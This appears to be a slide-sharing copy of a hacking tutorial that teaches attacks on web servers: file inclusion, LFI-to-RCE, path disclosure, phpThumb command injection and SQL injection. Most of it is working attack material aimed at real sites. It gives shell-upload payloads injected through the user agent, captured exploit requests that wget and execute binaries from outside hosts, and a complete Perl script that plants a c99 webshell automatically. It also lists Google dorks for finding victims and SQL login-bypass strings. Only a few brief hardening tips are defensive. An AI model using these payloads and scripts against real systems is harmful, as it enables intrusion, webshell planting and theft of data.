KEMBAR78
Web-servers & Application Hacking | DOCX
Raghav Bisht, profile picture
Uploaded byRaghav Bisht
DOCX, PDF22,915 views

Web-servers & Application Hacking

This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.

Technology
Related topics:
Penetration-Testing
Downloaded 426 times
1 / 293
2 / 293
3 / 293
4 / 293
5 / 293
Most read
6 / 293
7 / 293
Most read
8 / 293
Most read
9 / 293
10 / 293
11 / 293
12 / 293
13 / 293
14 / 293
15 / 293
16 / 293
17 / 293
18 / 293
19 / 293
20 / 293
21 / 293
22 / 293
23 / 293
24 / 293
25 / 293
26 / 293
27 / 293
28 / 293
29 / 293
30 / 293
31 / 293
32 / 293
33 / 293
34 / 293
35 / 293
36 / 293
37 / 293
38 / 293
39 / 293
40 / 293
41 / 293
42 / 293
43 / 293
44 / 293
45 / 293
46 / 293
47 / 293
48 / 293
49 / 293
50 / 293
51 / 293
52 / 293
53 / 293
54 / 293
55 / 293
56 / 293
57 / 293
58 / 293
59 / 293
60 / 293
61 / 293
62 / 293
63 / 293
64 / 293
65 / 293
66 / 293
67 / 293
68 / 293
69 / 293
70 / 293
71 / 293
72 / 293
73 / 293
74 / 293
75 / 293
76 / 293
77 / 293
78 / 293
79 / 293
80 / 293
81 / 293
82 / 293
83 / 293
84 / 293
85 / 293
86 / 293
87 / 293
88 / 293
89 / 293
90 / 293
91 / 293
92 / 293
93 / 293
94 / 293
95 / 293
96 / 293
97 / 293
98 / 293
99 / 293
100 / 293
101 / 293
102 / 293
103 / 293
104 / 293
105 / 293
106 / 293
107 / 293
108 / 293
109 / 293
110 / 293
111 / 293
112 / 293
113 / 293
114 / 293
115 / 293
116 / 293
117 / 293
118 / 293
119 / 293
120 / 293
121 / 293
122 / 293
123 / 293
124 / 293
125 / 293
126 / 293
127 / 293
128 / 293
129 / 293
130 / 293
131 / 293
132 / 293
133 / 293
134 / 293
135 / 293
136 / 293
137 / 293
138 / 293
139 / 293
140 / 293
141 / 293
142 / 293
143 / 293
144 / 293
145 / 293
146 / 293
147 / 293
148 / 293
149 / 293
150 / 293
151 / 293
152 / 293
153 / 293
154 / 293
155 / 293
156 / 293
157 / 293
158 / 293
159 / 293
160 / 293
161 / 293
162 / 293
163 / 293
164 / 293
165 / 293
166 / 293
167 / 293
168 / 293
169 / 293
170 / 293
171 / 293
172 / 293
173 / 293
174 / 293
175 / 293
176 / 293
177 / 293
178 / 293
179 / 293
180 / 293
181 / 293
182 / 293
183 / 293
184 / 293
185 / 293
186 / 293
187 / 293
188 / 293
189 / 293
190 / 293
191 / 293
192 / 293
193 / 293
194 / 293
195 / 293
196 / 293
197 / 293
198 / 293
199 / 293
200 / 293
201 / 293
202 / 293
203 / 293
204 / 293
205 / 293
206 / 293
207 / 293
208 / 293
209 / 293
210 / 293
211 / 293
212 / 293
213 / 293
214 / 293
215 / 293
216 / 293
217 / 293
218 / 293
219 / 293
220 / 293
221 / 293
222 / 293
223 / 293
224 / 293
225 / 293
226 / 293
227 / 293
228 / 293
229 / 293
230 / 293
231 / 293
232 / 293
233 / 293
234 / 293
235 / 293
236 / 293
237 / 293
238 / 293
239 / 293
240 / 293
241 / 293
242 / 293
243 / 293
244 / 293
245 / 293
246 / 293
247 / 293
248 / 293
249 / 293
250 / 293
251 / 293
252 / 293
253 / 293
254 / 293
255 / 293
256 / 293
257 / 293
258 / 293
259 / 293
260 / 293
261 / 293
262 / 293
263 / 293
264 / 293
265 / 293
266 / 293
267 / 293
268 / 293
269 / 293
270 / 293
271 / 293
272 / 293
273 / 293
274 / 293
275 / 293
276 / 293
277 / 293
278 / 293
279 / 293
280 / 293
281 / 293
282 / 293
283 / 293
284 / 293
285 / 293
286 / 293
287 / 293
288 / 293
289 / 293
290 / 293
291 / 293
292 / 293
293 / 293
2014 Root Root-XSecurity 1/1/2014 Web Servers & ApplicationHacking
Part 1 Web-hacking Attacks This is a tutorial about web-hacking methods that I and many other hackers have collected. I thought that many people would learn a lot from this here. Guide content :  Remote file inclusion  Localfile inclusion  LFI 2 RCE  LFI 2 RCE Using Firefox  Localfile download  Full path disclosure  CommandInjectionVulnerability Exploit  SQL Injection - with load file  MSSQLInjection  Blind SQL Injection  Postgre SQLInjection  Error based Postgre SQLInjection  SQL Injection on ASPX  Dot net nuke  XSS  CRLF  CSRF  Server Side Includes | Server Side Inclusion  Symlink Attack  Sql injection String & Union based  Xpath Injection  LDAP Injection  DNS Zone TransferVulnerability Exploit  Oracle Padding Attack Using Brup Suite
So let’s get started ! Remote file inclusion : 1) RFI RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed. Example: Code: http://www.site.com/index.php?page=home Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format. 2) Vulnerable script Code: <?php $page = $_GET['page']; include($page); ?> 3) Exploiting vulnerability We have site: Code: http://www.site.com/index.php?page=home Now instead of home we gonna use our shell. So we get: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt? If site is vulnerable it should show shell with list of files from site you are attacking. 4) Null byte bypass In some scripts there is a weak protection which is gonna include file and add html extension, or some other: Code: <?php $page = $_GET['page']; include($page.".html"); ?> In that case we are going to use null byte bypass(%00). Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.
So link should look like this: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00 5) Protection script Script should look like this: Code: <?php $page = $_GET['page']; include($page); ?> So we are going to add some stuff to protect it: Code: <?php $page = $_GET['page']; if(file_exists("pages/".$page) { include($page); } ?>
Local file inclusion : 1) LFI? LFI can be used on sites like: Code: http://link.com/index.php?page= by adding Code: ../../../../../../etc/passwd (sometimes you have to add %00 on passwd). 2) Finding vulnerable sites: Code: index.php?page= index.php?option= search.php?word= 3) Checking site vulnerability: Find some site and use Code: ../../../../../../../../../../../etc/passwd or Code: ../../../../../../../../../../../etc/passwd%00 When you enter this to link you get this: Code: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian- exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin which means that site is vulnerable. 4) proc/self/environ Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on the site.
Instead of etc/passwd%00 we are going to put /proc/self/environ If page prints this: Code: DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv.......... then proc/self/environ is enabled so we can upload the shell. 5) Shell uploading To upload the shell we need Mozilla Firefox: Code: http://www.mozilla.com/firefox/ Add-on Tamper Data: Code: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ Open site etc: Code: http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/s elf/environ Tools > Tamper Data click Start Tamper then refresh page and in user agent put next code: Code: <?system('wget www.link.com/shell.txt -O shell.php');?> Click OK. To access shell use: Code:www.link.com/shell.php
LFI 2 RCE  Find LFI vulnerabel site.  Check its link.
 Do -> http://www.site.com/index.php?lien=../../../../../../../../../../../../pro c/self/environ  Open command prompt and run script LFI2RCE.exe [C:lfi2rce.exe "< Website vuln link>"]
 Type Command -: id  Type Command -: uname -a  Type Command -: ls -l  Now Upload a "shell" in this web server so,  Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip  Type Command -: unzip c99.txt.zip  Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming "out14ws.php" is Public HTML page & move command will copy c99.txt Text to "opt14ws.php")  Type Command-: ls | grep Out14ws "OR " ls | grep c99  Type Command -: pwd [ To check present working directory of shell ]  Then open full link of your shell in yoyr web browse you get : http://website-name/path/path/c99.php http:// website-name/path/path/opt14ws.php.php
LFI 2 RCE Using Firefox  Check the target if it is vulnerable to lfi or not  Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00  Now. See -: http://www.site.com /index.php?page=../../../../../../proc/self/environ-: or http://www.site.com /index.php?page=../../../../../../proc/self/environ%00
 Now in address bar or firefox type : " about:config "  Find -: accessibility.browsewithcaret > rightclick > new > string  NEW STRING VALUE : general.useragent.override Press " Ok " new box will pop up ask for : ENTER STRING VALUE
 ENTER STRING VALUE : <?php phpinfo(); ?> It is general.useragent.override After it u will see something like :
 Now check the php version and Information while refreshing the vulnerable link or page. Find disabled information -: disable_functions - system, passthru, shellexec, popen, escapshellcmd, proc_open etc...  Once u have checked the php info go to : " about:config " page and see for "general.useragent.override " and ENTER STRING VALUE :  <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$outputn";}?></pre>  Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd /etc/passwd, pwd, etc...  For uploading Shell You can type command : wget http://www.site.com/c99.php Note : after putting command for getting its output you have to refresh the page or vulnable link.
 Command -: ls -la  Output : On refreshing page
 Command : uname -a
Local file download : 1) LFD? LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data. Code: http://site.com/download_file.php?file=notepad.exe 2) Vulnerable script Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> 3) Vulnerability check To check if script is vulnerable we are gonna try to download etc/passwd. So instead of: Code: http://site.com/download_file.php?file=notepad.exe We are gonna use: Code: http://site.com/download_file.php?file=../../../../../../../../../etc/passwd If it starts to download and if it open file in text editor it look something like this: Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin Script is vulnerable! NOTE: If it is a windows server use boot.ini instead of etc/passwd. 4) Exploiting vulnerability Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way: Code: http://site.com/download_file.php?filel=../
../ is gonna back us one directory backward and download file. 1.1 It is possible when it download file and open in text editor to print file list in directories. 1.2 or it is either possible to download file but when it is opened in text editor file is empty. In case 1.1 we dont have to guess file name and directory and we can download whatever we want. In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier). 5) Protection script We have script mentioned at start: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> by adding if(file_exists("download/".$file) we are gonna secure script. So it should look like: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); if(file_exists("download/".$file)) { header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; }
Full path disclosure : This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking. It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD. There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important. 1st is over array, by adding square brackets on link like this one: Code: index.php?page=home To finish vulnerability attack is to add [] on destined place: Code: index.php?page[]=home. That will give you error like this: Code: Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211 From this you can see on site is it exists directory blah. 2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java- injection, by adding java code on site you will get error. This is a javascript code: Code: javascript:void(document.cookie='PHPSESSID='); add that in your address bar and hit enter, now when page is refreshed you will get this error: Code: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58 then try to open directory thems on site, that should list you files in that directory. Protection: Most simple way to protect from this attacks is to turn-off error reporting. edit or add: Code: error_reporting(0);
Command Injection Vulnerability Exploit  phpThumb()"fltr[]" Command Injection Vulnerability Exploit Scans  Automatic Shell upload I. phpThumb() "fltr[]" Command Injection Vulnetability since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a command line argument. This can be exploited to inject and execute arbitrary shell commands via specially crafted requests. Successful exploitation requires that "ImageMagick" is installed. The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password". Source: phpThumb() "fltr[]" Command Injection Vulnerability By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level commands as there aren't any input validation checks for the $command data in phpthumb.functions.php. 00.function ImageMagickThumbnailToGD() { 01.... 02.foreach ($this->fltr as $filterkey => $filtercommand) { 03.@list($command, $parameter) = explode('|', $filtercommand, 2); 04.switch ($command) { 05.... 06.case 'blur': 07.if ($this->ImageMagickSwitchAvailable('blur')) { 08.@list($radius) = explode('|', $parameter); 09.$radius = ($radius ? $radius : 1); 10.$commandline .= ' -blur '.$radius; 11.unset($this->fltr[$filterkey]); 12.} 13.break;
14.... 15.$this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__); 16.$IMresult = phpthumb_functions::SafeExec($commandline); 17.clearstatcache(); 18.if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { 19.@unlink($IMtempSourceFilename); 20.} 21.if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { 22.$this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); 23.$this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__); 24.... 25.} The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit escaping of command line parameters according to the changelog. escapeshellarg The updated code uses the php escapeshellarg function and also limits the length of the input. 0.case 'blur': 1.if ($this->ImageMagickSwitchAvailable('blur')) { 2.@list($radius) = explode('|', $parameter); 3.$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1); 4.$commandline .= ' -blur '.escapeshellarg($radius); 5.$successfullyProcessedFilters[] = $filterkey; 6.} 7.break; The problem with these extensions is that they use dangerous PHP functions which have the potential to mess up a web hosting server and hack / exploit user accounts further up to root level.
Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing dangerous commands and take control over the complete server quickly. Certain functions which are used in such scripts are considered as dangerous and are turned off in the PHP configuration by certain responsible webhosts. (Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except by staying away from scripts that use these dangerous functions. Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with the following line: disable_functions = exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close, proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec Source: Disabling dangerous PHP functions 3.5 php.ini & disabled functions safe_mode = On expose_php = Off Enable_dl= Off magic_quotes = On register_globals = off display errors = off disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo, escapeshellarg,escapeshellcmd Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1 Exploit Scans The queries are as follows: GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps - aux; &phpThumbDebug=9 HTTP/1.1 GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1 GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1 Breakdown of the requests / commands: Exploit the vulnerability in phpThum.php fltr[] parameter.
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; Display all information about files / directories - shows long listing information about the file / directory. ls -l /tmp; Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6. wget -O /tmp/barbut6 bingoooo.co.uk/barbut6; Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so that the file can be executed. chmod 0755 /tmp/barbut6; Run / Excute file barbut6. /tmp/barbut6; The ps command gives a snapshot of the current processes. On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists all processes on a terminal, including those of other users, "x" lists all processes without controlling terminals and "u" adds a column for the controlling user for each process. Note that, for maximum compatibility when using this syntax, there is no "-" in front of the "aux". ps -aux;
Send SIGKILL to all perl processes. SIGKILL (Signal number 9) is a forced shutdown of a process. Note that with SIGKILL the process will not have opportunity to clean up any system resources it was using (e.g. temporary files etc.). killall -9 perl; Start perl and run / execute file f. perl /tmp/f; The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9. &phpThumbDebug=9 IP List List of IP's involved in the scans 65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 | 200.155.17.68 Targets view source print? 00.GET /cms/plugins/content/jthumbs/includes/phpThumb.php 01.GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php 02.GET /common/scripts/phpThumb/phpThumb.php 03.GET /phpThumb/phpThumb.php 04.GET /libs/phpThumb/phpThumb.php 05.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php 06.GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php 07.GET /gallery/phpThumb/phpThumb.php
08.GET /wp-content/themes/victore/phpthumb/phpThumb.php 09.GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php 10.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php 11.GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php 12.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php 13.GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 14.GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ phpThumb.php 15.GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/ph pThumb.php 16.GET /modules/phpThumb/phpThumb.php 17.GET /lib/phpThumb/phpThumb.php 18.GET /manager/phpThumb/phpThumb.php 19.GET /thumb/phpThumb.php 20.GET /global/phpthumb/phpThumb.php 21.GET /components/com_hotornot2/phpthumb/phpThumb.php 22.GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php 23.GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php 24.GET /staticfiles/phpThumb/phpThumb.php 25.GET /content/phpthumb/phpthumb.php 26.GET /class/phpthumb/phpThumb.php 27.GET /admin/phpThumb/phpThumb.php 28.GET /phpThumb.php 29.GET /admin/upload/phpThumb.php 30.GET /assets/components/phpthumb/phpThumb.php 31.GET /components/com_alphacontent/assets/phpthumb/phpThumb.php 32.GET /components/com_hotornot2/phpthumb/phpThumb.php 33.GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php
34.GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 35.GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 36.GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php 37.GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php 38.GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php II. Automatic ShelluploadPerlScript Note : Please change the c991.txt addressto your own shell address. #!/usr/bin/perl # Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload) # Date:09/09/2013 # Author: D35m0nd142 # Vendor Homepage: http://phpthumb.sourceforge.net/ # Tested on: phpThumb 1.7.9 # Enter the website in this form --> http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/ use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================n"; print " phpThumb <= 1.7.9 Remote Command Injection exploit n"; print " (Automatic Shell Upload) n"; print " created by D35m0nd142 n";
print "======================================================n"; sleep(0.8); print "Usage: perl phpthumb.pl <target> n"; exit(1); } if ($target !~ /http:///) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => "; #$shell = <STDIN>; #sleep(1); print "======================================================n"; print " phpThumb <= 1.7.9 Remote Command Injection exploit n"; print " (Automatic Shell Upload) n"; print " created by D35m0nd142 n"; print "======================================================n"; sleep(1.1); print "[*] Sending exploit ... n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); #print "Enter the command to execute => "; #$cmd = <STDIN>; $website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / )) { print "[+] Exploit sent with success. n"; sleep(1.4); } else { print "[-] Exploit sent but probably the website is not vulnerable. n"; sleep(1.3); } print "[*] Controlling if the txt shell has been uploaded ...n"; sleep(1.2); $cwebsite = "$target/c991.txt"; $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ )) { print "[+] Txt Shell uploaded :) n"; sleep(1); print "[*] Moving it to PHP format ... wait please ... n"; sleep(1.1); $mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9"; $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); $cwebsite = "$target/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute</b></a> ::</b></p></td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req- >content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ )) { print "[+] PHP Shell injected => '$cwebsite' :) n"; sleep(0.8); print "[*] Do you want to open it? (y/n) => "; $open = <STDIN>; if ($open == "y") { $firefox = "firefox $cwebsite"; system($firefox); } } else { print "[-] Error while moving shell from Txt to Php :( n"; exit(1); } } else { print "[-] Txt shell not uploaded. :( n"; }
MYSQL Injection : 1) Dorks Code: inurl:admin.asp inurl:login/admin.asp inurl:admin/login.asp inurl:adminlogin.asp inurl:adminhome.asp inurl:admin_login.asp inurl:administrator_login.asp I am going to use: Code: http://site.com/Admin_Login.asp 2) Logging Now you can find some site over these dorks and try to log in with: Username: Admin Password: password' or 1=1-- Instead of password' or 1=1 you can use some of these: Code: 'or'1'='1 ' or '1'='1 ' or 'x'='x ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a 'or'1=1' password' or 1=1 will the confuse server and will let you log in. So if you are able to log in, site is vulnerable and you are going to be able to use admin panel.
SQL Injection : 1) SQL Injection? SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format: Code: http://www.link.com/index.php?id= You can put anything else instead of index. 2) Finding vulnerable sites: Best way to find vulnerable site is by using Google. We use these dorks to find sites: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check: There are 2 ways to check if site is vulnerable. 1st way, we got link: Code: http://site.com/book.php?id=141 we are gonna add only ' at end of link so we get this link: Code: http://site.com/book.php?id=141' 2nd way, we got link: Code: http://site.com/book.php?id=141 we are going to add +and+1=2-- at end of link so we get: Code: http://site.com/book.php?id=141+and+1=2-- If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable. 4) Finding number of columns We can do it by using function order by, on link: Code: [http://site.com/book.php?id=141 adding +order+by+5-- Code: http://site.com/book.php?id=141+order+by+5--
If page is opens normal there is more then 5 columns. Lets try with 10. Code: http://site.com/book.php?id=141+order+by+10-- Now some part of site disappeared, which means that there's more then 5 and less then 10 columns. Lets try 7. Code: http://site.com/book.php?id=141+order+by+7-- Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8. Code: http://site.com/book.php?id=141+order+by+7-- on column 8 part of site disappear which means that there is 7 columns. 5) Finding vulnerable columns Finding vulnerable columns is done with function union select all on link (in this case) we are going to add +union+select+all+1,2,3,4,5,6,7-- Code: http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7-- It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column. 6) Finding database version As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version Code: http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7-- on page where number 2 was, it will show database version. If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version. We have version 5.0.51a-24+lenny5 which means that we don't have to guess name of table and column. 7) Finding table names If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step. Names of some possible tables: Code:
admin admins user users member members Names of some possible columns: Code: username uname un user name nick password pw pwd passwd If database version is 5 we can take name of table by doing next step: instead of number 2 we going to put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()-- So we get this link: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_sc hem a.tables+where+table_schema=database()-- Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table. 8) Finding column name We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we are going to put group_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we are going to put +from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table. Go to: Code: http://www.string-functions.com/string-hex.aspx write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns: Code: http://site.com/book.php?id=- 141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_s che ma.columns+where+table_name=0x7573657273--
